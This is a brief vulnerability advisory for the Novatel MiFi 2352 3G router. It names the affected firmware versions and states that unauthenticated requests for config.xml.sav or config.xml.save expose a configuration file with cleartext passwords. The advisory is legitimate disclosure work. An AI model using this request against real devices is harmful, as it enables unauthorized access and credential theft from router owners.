In spanish: http://www.securitybydefault.com/2010/01/vulnerabilidad-en-modemrouter-3g.html
Producto: Novatel MiFi 2352
Version:
access point firmware 11.47.17
router firmware: 012
modem firmware: 5.15.00.0-00 [2009-06-26 10:24:29]
Vulnerability:
You can access to xml configuration file with clear passwords bypassin
authentication process.
Exploit:
Just http://ip/config.xml.sav or http://ip/config.xml.save
Discover:
Alejandro Ramos - 16/01/2010
--
Alejandro Ramos -- aka dab
http://www.securitybydefault.com
--
Alejandro Ramos
http://twitter.com/aramosf